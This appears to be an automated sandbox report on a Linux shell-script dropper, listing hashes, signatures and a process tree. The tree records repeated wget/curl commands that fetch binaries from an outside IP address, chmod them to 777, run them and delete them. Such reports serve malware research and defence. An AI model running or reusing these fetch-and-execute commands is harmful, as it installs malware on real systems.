Analysis
-
max time kernel
65s -
max time network
66s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
arch:mips image:debian9-mipsbe-20240729-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mips system -
submitted
25/10/2024, 01:20
Static task
static1
Behavioral task
behavioral1
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh
-
Size
10KB
-
MD5
e85cfec36f14cf1239aeb4b66816d9b6
-
SHA1
54996a37402bd68d4d9592629ba35466aa659e7b
-
SHA256
2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583
-
SHA512
300a5cf3328c8392a91bc401ade0843b0d426078b4a7d026b0cfa6bc9959bb8f607eb8cdd63250e780224fc8cb68aea66d2993f7ad08286732684e392cfcf415
-
SSDEEP
192:S9G+eTfUXv3+Cs6BK+u+K+j+2+e+Z9p1gG+BFUp1gGC1xQTfUXvt+Cs6E+u+K+j+:S9G+Hcr+BFOC1xq
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh/tmp/2a4992a461a9294243239f72f8e4f14f24cf6cad4805da41b24d2d4f92bff583.sh1⤵PID:700
-
/bin/rm/bin/rm bins.sh2⤵PID:703
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:705
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:716
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:726
-
-
/bin/chmodchmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- File and Directory Permissions Modification
PID:729
-
-
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Executes dropped EXE
PID:730
-
-
/bin/rmrm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:732
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:733
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:734
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:735
-
-
/bin/chmodchmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- File and Directory Permissions Modification
PID:736
-
-
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Executes dropped EXE
PID:737
-
-
/bin/rmrm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:738
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:739
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:740
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:744
-
-
/bin/chmodchmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:752
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:753
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:758
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:764
-
-
/bin/chmodchmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Executes dropped EXE
PID:769
-
-
/bin/rmrm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:772
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:773
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:789
-
-
/bin/chmodchmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- File and Directory Permissions Modification
PID:793
-
-
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Executes dropped EXE
PID:794
-
-
/bin/rmrm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:798
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:802
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:804
-
-
/bin/chmodchmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:809
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:815
-
-
/bin/chmodchmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:836
-
-
/bin/chmodchmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- File and Directory Permissions Modification
PID:839
-
-
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Executes dropped EXE
PID:841
-
-
/bin/rmrm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:844
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:845
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:852
-
-
/bin/chmodchmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:855
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:856
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:861
-
-
/bin/chmodchmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- File and Directory Permissions Modification
PID:862
-
-
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Executes dropped EXE
PID:863
-
-
/bin/rmrm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:864
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:865
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:866
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:867
-
-
/bin/chmodchmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:873
-
-
/bin/chmodchmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:879
-
-
/bin/chmodchmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:885
-
-
/bin/chmodchmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:891
-
-
/bin/chmodchmod 777 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu./8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm 8heg2XUkWT3JkRta6FMp9GA4CNOYsFdvEu2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:897
-
-
/bin/chmodchmod 777 cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY./cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm cvqh3h3es9WKXspB3xkj0AGrvyv6kletcY2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:901
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Reads runtime system information
- Writes file to tmp directory
PID:902
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:903
-
-
/bin/chmodchmod 777 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- File and Directory Permissions Modification
PID:904
-
-
/tmp/4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy959./4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵
- Executes dropped EXE
PID:905
-
-
/bin/rmrm 4sujuxQlpLWkUQ1t8ysVZkf8UZ2QtYy9592⤵PID:906
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:907
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:908
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:909
-
-
/bin/chmodchmod 777 res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- File and Directory Permissions Modification
PID:910
-
-
/tmp/res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR./res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵
- Executes dropped EXE
PID:911
-
-
/bin/rmrm res5GxtJJl0etuCFb12vUP2Yh2yMSnYIfR2⤵PID:912
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:913
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:914
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:915
-
-
/bin/chmodchmod 777 wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- File and Directory Permissions Modification
PID:916
-
-
/tmp/wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ./wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵
- Executes dropped EXE
PID:917
-
-
/bin/rmrm wRh4uEv1izZrLgZ9YY4soxiqnyW6TxUHcZ2⤵PID:918
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:919
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:920
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:921
-
-
/bin/chmodchmod 777 pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- File and Directory Permissions Modification
PID:922
-
-
/tmp/pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z./pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵
- Executes dropped EXE
PID:923
-
-
/bin/rmrm pYXG8qGGVcy8OF9a3Ig0lkEFoW9d1Pp56Z2⤵PID:924
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:925
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:926
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:927
-
-
/bin/chmodchmod 777 VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI./VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm VrvCCoeSu7U0BxGcjYlH6Kus7Pup34szhI2⤵PID:930
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:931
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:933
-
-
/bin/chmodchmod 777 ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- File and Directory Permissions Modification
PID:934
-
-
/tmp/ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU0./ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵
- Executes dropped EXE
PID:935
-
-
/bin/rmrm ZSGUtYPM3hqbag6JaRivunTpsRMQn1FaU02⤵PID:936
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:937
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:938
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:939
-
-
/bin/chmodchmod 777 bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- File and Directory Permissions Modification
PID:940
-
-
/tmp/bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf./bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵
- Executes dropped EXE
PID:941
-
-
/bin/rmrm bkGyaic4ccr8jsDguqepGeOjRdnI7sUohf2⤵PID:942
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:943
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:944
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:945
-
-
/bin/chmodchmod 777 TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk./TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm TlMLfoUpBQlacZhZRQwjBtv0s4cVCKpANk2⤵PID:948
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:949
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:951
-
-
/bin/chmodchmod 777 KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- File and Directory Permissions Modification
PID:952
-
-
/tmp/KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh./KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵
- Executes dropped EXE
PID:953
-
-
/bin/rmrm KnsYJUvbQCrmWlswnysXGSWwONpFi6Ofwh2⤵PID:954
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:955
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:956
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:957
-
-
/bin/chmodchmod 777 zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- File and Directory Permissions Modification
PID:958
-
-
/tmp/zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC./zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵
- Executes dropped EXE
PID:959
-
-
/bin/rmrm zYL0iTmwvPNV3suI91hrYBW2eU5A8frLZC2⤵PID:960
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:961
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:962
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:963
-
-
/bin/chmodchmod 777 Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- File and Directory Permissions Modification
PID:964
-
-
/tmp/Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR./Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵
- Executes dropped EXE
PID:965
-
-
/bin/rmrm Quktsa0L8pLEfZOPDz7lXwyKDyJsL8v7tR2⤵PID:966
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:967
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:968
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:969
-
-
/bin/chmodchmod 777 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- File and Directory Permissions Modification
PID:970
-
-
/tmp/9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx./9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵
- Executes dropped EXE
PID:971
-
-
/bin/rmrm 9R3RRYjg7ps78C5mCB4NyaO1J3QnNU2pPx2⤵PID:972
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
-
MD5
998368d7c95ea4293237f2320546e440
-
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
-
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
-
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97